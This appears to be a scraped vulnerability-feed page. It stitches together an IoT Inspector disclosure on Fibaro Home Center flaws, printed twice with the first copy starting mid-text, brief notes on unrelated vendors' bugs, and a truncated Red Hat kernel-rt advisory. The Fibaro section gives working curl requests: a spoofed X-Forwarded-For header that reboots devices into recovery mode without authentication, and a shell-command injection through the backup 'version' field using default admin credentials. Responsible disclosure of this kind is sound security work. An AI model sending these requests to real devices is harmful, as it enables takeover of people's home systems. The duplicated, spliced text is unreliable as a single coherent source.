handleResponse(response) end, error = function(error) print(error) end }) end getSupportData() </snip> Here, the remote support endpoint returns the following data: {"ip":"fwd-support.eu.ra.fibaro.com","port":"XXXXX","private_ip":"10.100.YYY .ZZZ"} The same dropbear ssh client is used with option -y. In this case, port 22 (ssh) is made accessible through the port-forward. However, the device only allows public key authentication with a hard-coded SSH key. No further testing has been done on compromising the support SSH connection. 2) Unauthenticated access to shutdown, reboot and reboot to recovery mode The device is running a nginx server, which forwards some requests to a lighttpd server (8000) for further processing: <snip> proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; location ~* \.php$ { proxy_pass http://127.0.0.1:8000; } location ~* \.php\?.* { proxy_pass http://127.0.0.1:8000; } </snip> The lighttpd server is not only accessible locally, but also via the local network. Authentication and authorization is implemented in PHP and there is a special check for connections originating from within the host. However, when checking the remote IP address, the header X-Forwarded-For is also considered: ./var/www/authorize.php <snip> function isLocalRequest() { $ipAddress = ""; if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) $ipAddress = $_SERVER['HTTP_X_FORWARDED_FOR']; else $ipAddress = $_SERVER['REMOTE_ADDR']; $whitelist = array( '127.0.0.1', '::1' ); if(in_array($ipAddress, $whitelist)) return true; return false; } </snip> As the lighttpd service available via the network, an attacked can inject the required header X-Forwarded-For as well. The check isLocalRequest is used to "secure" multiple endpoints: ./var/www/services/system/shutdown.php <snip> <?php require_once("../../authorize.php"); if (!isLocalRequest() && !isAuthorized()) { sendUnauthorized(); } else { exec("systemShutdown"); } ?> </snip> ./var/www/services/system/reboot.php <snip> function authorize() { return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER, role::INSTALLER)); } function handlePOST($text) { if (!isLocalRequest() && !authorize()) { sendUnauthorized(); return; } $params = tryDecodeJson($text); if(!is_null($params) && isset($params->recovery) && $params->recovery === true) exec("rebootToRecovery"); else exec("systemReboot"); } $requestBody = file_get_contents('php://input'); $requestMethod = $_SERVER['REQUEST_METHOD']; if ($requestMethod == "POST") handlePOST($requestBody); else setStatusMethodNotAllowed(); </snip> An attacker can issue the the following HTTP request to reboot the device into recovery mode: curl -H 'X-Forwarded-For: 127.0.0.1' -H 'Content-Type: application/json' -d '{"recovery":true}' http://DEVICE:8000/services/system/reboot.php In recovery mode, firmware images can be updated without authentication. 3) Authenticated remote command execution (versions before 4.550) Backup & restore operations could be triggered though HTTP endpoints: ./var/www/services/system/backups.php <snip> function restoreBackup($params) { if (getNumberOfInstances('{screen} SCREEN -dmS RESTORE') > 0) { setStatusTooManyRequests(); return; } $type = $params->type; $id = $params->id; $version = $params->version; if (is_null($id) || !is_numeric($id) || $id < 1 ) { setStatusBadRequest(); return; } $hcVersion = exec("cat /mnt/hw_data/serial | cut -c1-3"); if ($type == "local" && $hcVersion == "HC2" || $type == "remote") { $version ? exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. $id . ' ' . $version) : exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. $id); } else { setStatusBadRequest(); return; } setStatusAccepted(); } </snip> The parameter $version is not sanitized or escaped, which allows an attacker to inject shell commands into the exec() call: cat > /tmp/exploit <<- EOM {"action": "restore", "params": {"type": "remote", "id": 1, "version": "1; INJECTED COMMAND"}} EOM curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'content-type: application/json' -d@/tmp/exploit http://DEVICE/services/system/backups.php Version 4.550 and later have proper escaping: <snip> $version = escapeshellarg($params->version); </snip> 4) Unencrypted management interface NMMAP shows a few open ports on the box: PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 8000/tcp open http-alt Both 80/tcp and 8000/tcp can be accessed over unencrypted HTTP. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ Vulnerable / tested versions: ----------------------------- Vulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest version at the time of the discovery Vulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530 Solution: --------- Upgrade to the version 4.610 or latest version, which fixes vulnerabilities 1, 2 and 3. Vulnerability 4 is not fixed as the vendor assumes that the local network is trusted and the device only provides wired network access. Furthermore, the vendor recommends using the cloud-based management interface, which is accessible over HTTPS and requests are forwarded via an encrypted SSH connection between the Fibaro cloud and the device. Advisory URL: ------------- https://www.iot-inspector.com/blog/advisory-fibaro-home-center/ Vendor contact timeline: ------------------------ 2020-11-18: Contacting Fibaro through support@fibaro.com, support-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com 2020-11-23: Contacting Fibaro on Facebook & LinkedIn, got response on LinkedIn 2020-11-24: Adivsory sent to Fibaro by email 2020-12-01: Fibaro confirmed the receipt of the advisory 2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes 2021-03-16: Fibaro beta release (4.601) with the fixes 2021-03-24: Fibaro applies for CVE numbers 2021-03-31: Fibaro GA release (4.610) with the fix 2021-04-08: IoT Inspector Research Lab publishes advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ The IoT Inspector Research Lab is an integrated part of IoT Inspector. IoT Inspector is a platform for automated security analysis and compliance checks of IoT firmware. Our mission is to secure the Internet of Things. In order to discover vulnerabilities and vulnerability patterns within IoT devices and to further enhance automated identification that allows for scalable detection within IoT Inspector, we conduct excessive security research in the area of IoT. Whenever the IoT Inspector Research Lab discovers vulnerabilities in IoT firmware, we aim to responsibly disclose relevant information to the vendor of the affected IoT device as well as the general public in a way that minimizes potential harm and encourages further security analyses of IoT systems. You can find our responsible disclosure policy here: https://www.iot-inspector.com/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ Interested in using IoT Inspector for your research or product? Mail: research at iot-inspector dot com Web: https://www.iot-inspector.com Blog: https://www.iot-inspector.com/blog/ Twitter: https://twitter.com/iotinspector EOF Marton Illes / @2021

In Fibaro Home Center 2 and Lite devices in all versions provide a web based management interface over unencrypted HTTP protocol. Communication between the user and the device can be eavesdropped to hijack sessions, tokens and passwords. IoT Inspector Research Lab Advisory IOT-20210408-0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ title: Multiple vulnerabilities vendor/product: Fibaro Home Center Light / Fibaro Home Center 2 https://www.fibaro.com/ vulnerable version: 4.600 and older fixed version: 4.610 CVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991, CVE-2021-20992 impact: 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 9.8 (critical) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 7.2 (high) CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H reported: 2020-11-18 publication: 2021-04-08 by: Marton Illes, IoT Inspector Research Lab https://www.iot-inspector.com/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ Vendor description: ------------------- "FIBARO is a global brand based on the Internet of Things technology. It provides solutions for building and home automation. FIBARO's headquarters and factory are located in Wysogotowo, 3 miles away from Poznan. The company employs app. 250 employees." https://www.fibaro.com/en/about-us/ Vulnerability overview/description: ----------------------------------- 1) Cloud SSH Connection Man-in-the-Middle Attack (CVE-2021-20989) Home Center devices initiate SSH connections to the Fibaro cloud to provide remote access and remote support capabilities. This connection can be intercepted using a man-in-the-middle attack and a device initiated remote port-forward channel can be used to connect to the web management interface. IoT Inspector identified a disabled SSH host key check, which enables man-in-the-middle attacks. 2) Unauthenticated access to shutdown, reboot and reboot to recovery mode (CVE-2021-20990) An internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot, or a reboot into recovery mode. In recovery mode, an attacker can upload firmware without authentication. (Potentially an earlier version with known remote command execution vulnerability, see #3) 3) Authenticated remote command execution (versions before 4.550) (CVE-2021-20991) An authenticated user can run commands as root user using a command injection vulnerability. The management interface is only available over HTTP on the local network. The vendor recommends using the cloud-based management interface, which is accessible over HTTPS and requests are forwarded via an encrypted SSH connection between the Fibaro cloud and the device. Proof of concept: ----------------- 1) Cloud SSH Connection Man-in-the-Middle Attack Home Center devices initiate a SSH connection to the Fibaro cloud ./etc/init.d/fibaro/RemoteAccess <snip> DAEMON=/usr/bin/ssh .... case "$1" in start) ..... # get IP local GET_IP_URL="https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Seria l}&HW_Key=${HW_Key}" local IP_Response; IP_Response=$(curl -f -s -S --retry 3 --connect-timeout 100 --max-time 100 "${GET_IP_URL}" | tr -d ' !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~') # get PORT local GET_PORT_URL="https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_S erial}&HW_Key=${HW_Key}" local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3 --connect-timeout 100 --max-time 100 "${GET_PORT_URL}" | tr -d ' !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~') .... start-stop-daemon --start --background --pidfile "${PIDFILE}" --make-pidfile --startas /usr/bin/screen \ -- -DmS ${NAME} ${DAEMON} -y -K 30 -i /etc/dropbear/dropbear_rsa_host_key -R "${PORT_Response}":localhost:80 remote2@"${IP_Response}" </snip> The device uses dropbear ssh to initiate the connection; option -y disables any host-key checks, voiding much of the otherwise added transport-layer security by SSH: "Always accept hostkeys if they are unknown." The above "get IP" endpoint returns the address of the Fibaro cloud, e.g.: lb-1.eu.ra.fibaro.com An attacker can use DNS spoofing or other means to intercept the connection. By using any hostkey, the attacker can successfully authenticate the SSH connection. Once the connection is authenticated, the client initiates a remote port-forward: -R "${PORT_Response}":localhost:80 This enables the attacker to access port 80 (management interface) of the device. A similar problem exists for remote support connections: ./opt/fibaro/scripts/remote-support.lua <snip> function handleResponse(response) responseJson = json.decode(response.data) print(json.encode(responseJson)) local autoSSHCommand = 'ssh -y -K 30 -i /etc/dropbear/dropbear_rsa_host_key -R ' .. responseJson.private_ip.. ':' .. responseJson.port .. ':localhost:22 remote2@' .. responseJson.ip os.execute(autoSSHCommand) end function getSupportData() remoteUrl='https://dom.fibaro.com/get_support_route.php?PK_AccessPoint=' .. serialNumber .. '&HW_Key=' .. HWKey print(remoteUrl) http = net.HTTPClient({timeout = 5000}) http:request(remoteUrl, { options = { method = 'GET' }, success = function(response) handleResponse(response) end, error = function(error) print(error) end }) end getSupportData() </snip> Here, the remote support endpoint returns the following data: {"ip":"fwd-support.eu.ra.fibaro.com","port":"XXXXX","private_ip":"10.100.YYY .ZZZ"} The same dropbear ssh client is used with option -y. In this case, port 22 (ssh) is made accessible through the port-forward. However, the device only allows public key authentication with a hard-coded SSH key. No further testing has been done on compromising the support SSH connection. 2) Unauthenticated access to shutdown, reboot and reboot to recovery mode The device is running a nginx server, which forwards some requests to a lighttpd server (8000) for further processing: <snip> proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; location ~* \.php$ { proxy_pass http://127.0.0.1:8000; } location ~* \.php\?.* { proxy_pass http://127.0.0.1:8000; } </snip> The lighttpd server is not only accessible locally, but also via the local network. Authentication and authorization is implemented in PHP and there is a special check for connections originating from within the host. However, when checking the remote IP address, the header X-Forwarded-For is also considered: ./var/www/authorize.php <snip> function isLocalRequest() { $ipAddress = ""; if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) $ipAddress = $_SERVER['HTTP_X_FORWARDED_FOR']; else $ipAddress = $_SERVER['REMOTE_ADDR']; $whitelist = array( '127.0.0.1', '::1' ); if(in_array($ipAddress, $whitelist)) return true; return false; } </snip> As the lighttpd service available via the network, an attacked can inject the required header X-Forwarded-For as well. The check isLocalRequest is used to "secure" multiple endpoints: ./var/www/services/system/shutdown.php <snip> <?php require_once("../../authorize.php"); if (!isLocalRequest() && !isAuthorized()) { sendUnauthorized(); } else { exec("systemShutdown"); } ?> </snip> ./var/www/services/system/reboot.php <snip> function authorize() { return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER, role::INSTALLER)); } function handlePOST($text) { if (!isLocalRequest() && !authorize()) { sendUnauthorized(); return; } $params = tryDecodeJson($text); if(!is_null($params) && isset($params->recovery) && $params->recovery === true) exec("rebootToRecovery"); else exec("systemReboot"); } $requestBody = file_get_contents('php://input'); $requestMethod = $_SERVER['REQUEST_METHOD']; if ($requestMethod == "POST") handlePOST($requestBody); else setStatusMethodNotAllowed(); </snip> An attacker can issue the the following HTTP request to reboot the device into recovery mode: curl -H 'X-Forwarded-For: 127.0.0.1' -H 'Content-Type: application/json' -d '{"recovery":true}' http://DEVICE:8000/services/system/reboot.php In recovery mode, firmware images can be updated without authentication. 3) Authenticated remote command execution (versions before 4.550) Backup & restore operations could be triggered though HTTP endpoints: ./var/www/services/system/backups.php <snip> function restoreBackup($params) { if (getNumberOfInstances('{screen} SCREEN -dmS RESTORE') > 0) { setStatusTooManyRequests(); return; } $type = $params->type; $id = $params->id; $version = $params->version; if (is_null($id) || !is_numeric($id) || $id < 1 ) { setStatusBadRequest(); return; } $hcVersion = exec("cat /mnt/hw_data/serial | cut -c1-3"); if ($type == "local" && $hcVersion == "HC2" || $type == "remote") { $version ? exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. $id . ' ' . $version) : exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. $id); } else { setStatusBadRequest(); return; } setStatusAccepted(); } </snip> The parameter $version is not sanitized or escaped, which allows an attacker to inject shell commands into the exec() call: cat > /tmp/exploit <<- EOM {"action": "restore", "params": {"type": "remote", "id": 1, "version": "1; INJECTED COMMAND"}} EOM curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'content-type: application/json' -d@/tmp/exploit http://DEVICE/services/system/backups.php Version 4.550 and later have proper escaping: <snip> $version = escapeshellarg($params->version); </snip> 4) Unencrypted management interface NMMAP shows a few open ports on the box: PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 8000/tcp open http-alt Both 80/tcp and 8000/tcp can be accessed over unencrypted HTTP. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ Vulnerable / tested versions: ----------------------------- Vulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest version at the time of the discovery Vulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530 Solution: --------- Upgrade to the version 4.610 or latest version, which fixes vulnerabilities 1, 2 and 3. Vulnerability 4 is not fixed as the vendor assumes that the local network is trusted and the device only provides wired network access. Furthermore, the vendor recommends using the cloud-based management interface, which is accessible over HTTPS and requests are forwarded via an encrypted SSH connection between the Fibaro cloud and the device. Advisory URL: ------------- https://www.iot-inspector.com/blog/advisory-fibaro-home-center/ Vendor contact timeline: ------------------------ 2020-11-18: Contacting Fibaro through support@fibaro.com, support-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com 2020-11-23: Contacting Fibaro on Facebook & LinkedIn, got response on LinkedIn 2020-11-24: Adivsory sent to Fibaro by email 2020-12-01: Fibaro confirmed the receipt of the advisory 2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes 2021-03-16: Fibaro beta release (4.601) with the fixes 2021-03-24: Fibaro applies for CVE numbers 2021-03-31: Fibaro GA release (4.610) with the fix 2021-04-08: IoT Inspector Research Lab publishes advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ The IoT Inspector Research Lab is an integrated part of IoT Inspector. IoT Inspector is a platform for automated security analysis and compliance checks of IoT firmware. Our mission is to secure the Internet of Things. In order to discover vulnerabilities and vulnerability patterns within IoT devices and to further enhance automated identification that allows for scalable detection within IoT Inspector, we conduct excessive security research in the area of IoT. Whenever the IoT Inspector Research Lab discovers vulnerabilities in IoT firmware, we aim to responsibly disclose relevant information to the vendor of the affected IoT device as well as the general public in a way that minimizes potential harm and encourages further security analyses of IoT systems. You can find our responsible disclosure policy here: https://www.iot-inspector.com/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ Interested in using IoT Inspector for your research or product? Mail: research at iot-inspector dot com Web: https://www.iot-inspector.com Blog: https://www.iot-inspector.com/blog/ Twitter: https://twitter.com/iotinspector EOF Marton Illes / @2021

Suzhou Keda Technology Co., Ltd. is a provider of video and security products and solutions. It is committed to helping various government and corporate customers solve visual communication and management problems with video conferencing, video surveillance and video application solutions. The MSS streaming media server of Suzhou Keda Technology Co., Ltd. has a directory traversal vulnerability. Attackers can use the vulnerability to obtain sensitive information.

Samsung (China) Investment Co., Ltd. is the headquarters of the Samsung Group in China. Its business scope includes selling products produced by the companies it invests in, purchasing machinery and equipment for the company's own use, office equipment, and raw materials needed for production. WLAN AP has a command execution vulnerability, which can be exploited by an attacker to gain server control authority.

Shanghai Aitai Technology Co., Ltd. is a small and medium-sized network solution provider and service provider in China. Aitai network management system has a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.

Jiuze Technology is a mobile Internet customized software service provider, providing enterprise customers with one-stop mobile Internet solutions from product planning, conceptual design to software delivery, and operation promotion. A SQL injection vulnerability exists in the intelligent IoT system of Nanjing Jiuze Software Technology Co., Ltd. Attackers can use vulnerabilities to obtain sensitive information in the database.

RG-EG Easy Gateway Management System is a multi-service integrated gateway product launched by Ruijie Networks to solve the current network export problems. There is a command execution vulnerability in the RG-EG Easy Gateway management system. Attackers can use this vulnerability to obtain root privileges of the device and execute arbitrary commands remotely.

IBM WebSphere Application Server 8.0, 8.5, and 9.0 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 196648. This product is a platform for JavaEE and Web service applications, as well as the foundation of the IBM WebSphere software platform

A race condition in Linux kernel SCTP sockets (net/sctp/socket.c) before 5.12-rc8 can lead to kernel privilege escalation from the context of a network service or an unprivileged process. If sctp_destroy_sock is called without sock_net(sk)->sctp.addr_wq_lock then an element is removed from the auto_asconf_splist list without any proper locking. This can be exploited by an attacker with network service privileges to escalate to root or from the context of an unprivileged user directly if a BPF_CGROUP_INET_SOCK_CREATE is attached which denies creation of some SCTP socket. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Moderate: kernel-rt security and bug fix update Advisory ID: RHSA-2021:4140-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:4140 Issue date: 2021-11-09 CVE Names: CVE-2020-0427 CVE-2020-24502 CVE-2020-24503 CVE-2020-24504 CVE-2020-24586 CVE-2020-24587 CVE-2020-24588 CVE-2020-26139 CVE-2020-26140 CVE-2020-26141 CVE-2020-26143 CVE-2020-26144 CVE-2020-26145 CVE-2020-26146 CVE-2020-26147 CVE-2020-29368 CVE-2020-29660 CVE-2020-36158 CVE-2020-36386 CVE-2021-0129 CVE-2021-3348 CVE-2021-3489 CVE-2021-3564 CVE-2021-3573 CVE-2021-3600 CVE-2021-3635 CVE-2021-3659 CVE-2021-3679 CVE-2021-3732 CVE-2021-20194 CVE-2021-20239 CVE-2021-23133 CVE-2021-28950 CVE-2021-28971 CVE-2021-29155 CVE-2021-29646 CVE-2021-29650 CVE-2021-31440 CVE-2021-31829 CVE-2021-31916 CVE-2021-33200 ==================================================================== 1. Summary: An update for kernel-rt is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux NFV (v. 8) - x86_64 Red Hat Enterprise Linux RT (v. 8) - x86_64 3. Description: The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Security Fix(es): * kernel: out-of-bounds reads in pinctrl subsystem. (CVE-2020-0427) * kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24502) * kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24503) * kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24504) * kernel: Fragmentation cache not cleared on reconnection (CVE-2020-24586) * kernel: Reassembling fragments encrypted under different keys (CVE-2020-24587) * kernel: wifi frame payload being parsed incorrectly as an L2 frame (CVE-2020-24588) * kernel: Forwarding EAPOL from unauthenticated wifi client (CVE-2020-26139) * kernel: accepting plaintext data frames in protected networks (CVE-2020-26140) * kernel: not verifying TKIP MIC of fragmented frames (CVE-2020-26141) * kernel: accepting fragmented plaintext frames in protected networks (CVE-2020-26143) * kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header (CVE-2020-26144) * kernel: accepting plaintext broadcast fragments as full frames (CVE-2020-26145) * kernel: locking inconsistency in tty_io.c and tty_jobctrl.c can lead to a read-after-free (CVE-2020-29660) * kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function via a long SSID value (CVE-2020-36158) * kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() (CVE-2020-36386) * kernel: Improper access control in BlueZ may allow information disclosure vulnerability. (CVE-2021-0129) * kernel: Use-after-free in ndb_queue_rq() (CVE-2021-3348) * kernel: Linux kernel eBPF RINGBUF map oversized allocation (CVE-2021-3489) * kernel: double free in bluetooth subsystem when the HCI device initialization fails (CVE-2021-3564) * kernel: use-after-free in function hci_sock_bound_ioctl() (CVE-2021-3573) * kernel: eBPF 32-bit source register truncation on div/mod (CVE-2021-3600) * kernel: DoS in rb_per_cpu_empty() (CVE-2021-3679) * kernel: overlayfs: Mounting overlayfs inside an unprivileged user namespace can reveal files (CVE-2021-3732) * kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt() (CVE-2021-20194) * kernel: Race condition in sctp_destroy_sock list_del (CVE-2021-23133) * kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode (CVE-2021-28950) * kernel: System crash in intel_pmu_drain_pebs_nhm (CVE-2021-28971) * kernel: protection for sequences of pointer arithmetic operations against speculatively out-of-bounds loads can be bypassed to leak content of kernel memory (CVE-2021-29155) * kernel: improper input validation in tipc_nl_retrieve_key function (CVE-2021-29646) * kernel: lack a full memory barrier upon the assignment of a new table value in x_tables.h may lead to DoS (CVE-2021-29650) * kernel: local escalation of privileges in handling of eBPF programs (CVE-2021-31440) * kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory (CVE-2021-31829) * kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier (CVE-2021-33200) * kernel: reassembling encrypted fragments with non-consecutive packet numbers (CVE-2020-26146) * kernel: reassembling mixed encrypted/plaintext fragments (CVE-2020-26147) * kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check (CVE-2020-29368) * kernel: flowtable list del corruption with kernel BUG (CVE-2021-3635) * kernel: NULL pointer dereference in llsec_key_alloc() (CVE-2021-3659) * kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure (CVE-2021-20239) * kernel: out of bounds array access in drivers/md/dm-ioctl.c (CVE-2021-31916) 4. Solution: For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.5 Release Notes linked from the References section. For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 The system must be rebooted for this update to take effect. 5. Bugs fixed (https://bugzilla.redhat.com/): 1875275 - Failure to enter full_nohz due to needless SCHED softirqs 1902412 - [kernel-rt] BUG: using smp_processor_id() in preemptible [00000000] code: kworker/u129:3/1367837 observed with blktests nvme-tcp tests 1903244 - CVE-2020-29368 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check 1905747 - kernel-rt-debug: WARNING: possible circular locking dependency detected(&serv->sv_lock -> (softirq_ctrl.lock).lock) 1906522 - CVE-2020-29660 kernel: locking inconsistency in drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c can lead to a read-after-free 1912683 - CVE-2021-20194 kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt() 1913348 - CVE-2020-36158 kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function in drivers/net/wireless/marvell/mwifiex/join.c via a long SSID value 1919893 - CVE-2020-0427 kernel: out-of-bounds reads in pinctrl subsystem. 1921958 - CVE-2021-3348 kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c 1923636 - CVE-2021-20239 kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure 1930376 - CVE-2020-24504 kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers 1930379 - CVE-2020-24502 kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers 1930381 - CVE-2020-24503 kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers 1941762 - CVE-2021-28950 kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode 1941784 - CVE-2021-28971 kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c 1945345 - CVE-2021-29646 kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c 1945388 - CVE-2021-29650 kernel: lack a full memory barrier upon the assignment of a new table value in net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h may lead to DoS 1946965 - CVE-2021-31916 kernel: out of bounds array access in drivers/md/dm-ioctl.c 1948772 - CVE-2021-23133 kernel: Race condition in sctp_destroy_sock list_del 1951595 - CVE-2021-29155 kernel: protection for sequences of pointer arithmetic operations against speculatively out-of-bounds loads can be bypassed to leak content of kernel memory 1957788 - CVE-2021-31829 kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory 1959559 - CVE-2021-3489 kernel: Linux kernel eBPF RINGBUF map oversized allocation 1959642 - CVE-2020-24586 kernel: Fragmentation cache not cleared on reconnection 1959654 - CVE-2020-24587 kernel: Reassembling fragments encrypted under different keys 1959657 - CVE-2020-24588 kernel: wifi frame payload being parsed incorrectly as an L2 frame 1959663 - CVE-2020-26139 kernel: Forwarding EAPOL from unauthenticated wifi client 1960490 - CVE-2020-26140 kernel: accepting plaintext data frames in protected networks 1960492 - CVE-2020-26141 kernel: not verifying TKIP MIC of fragmented frames 1960496 - CVE-2020-26143 kernel: accepting fragmented plaintext frames in protected networks 1960498 - CVE-2020-26144 kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header 1960500 - CVE-2020-26145 kernel: accepting plaintext broadcast fragments as full frames 1960502 - CVE-2020-26146 kernel: reassembling encrypted fragments with non-consecutive packet numbers 1960504 - CVE-2020-26147 kernel: reassembling mixed encrypted/plaintext fragments 1964028 - CVE-2021-31440 kernel: local escalation of privileges in handling of eBPF programs 1964139 - CVE-2021-3564 kernel: double free in bluetooth subsystem when the HCI device initialization fails 1965038 - CVE-2021-0129 kernel: Improper access control in BlueZ may allow information disclosure vulnerability. 1965458 - CVE-2021-33200 kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier 1966578 - CVE-2021-3573 kernel: use-after-free in function hci_sock_bound_ioctl() 1969489 - CVE-2020-36386 kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() in net/bluetooth/hci_event.c 1975949 - CVE-2021-3659 kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c 1976946 - CVE-2021-3635 kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50 1981954 - CVE-2021-3600 kernel: eBPF 32-bit source register truncation on div/mod 1989165 - CVE-2021-3679 kernel: DoS in rb_per_cpu_empty() 1995249 - CVE-2021-3732 kernel: overlayfs: Mounting overlayfs inside an unprivileged user namespace can reveal files 6. Package List: Red Hat Enterprise Linux NFV (v. 8): Source: kernel-rt-4.18.0-348.rt7.130.el8.src.rpm x86_64: kernel-rt-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-core-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-debug-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-debug-core-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-debug-devel-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-debug-kvm-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-debug-modules-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-debuginfo-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-devel-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-kvm-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-modules-4.18.0-348.rt7.130.el8.x86_64.rpm kernel-rt-modules-extra-4.18.0-348.rt7.130.el8.x86_64.rpm Red Hat Enterprise Linux RT (v. 8): Source: kernel-rt-4.18.0-348.rt7.130.el8.src.rpm x86_64: 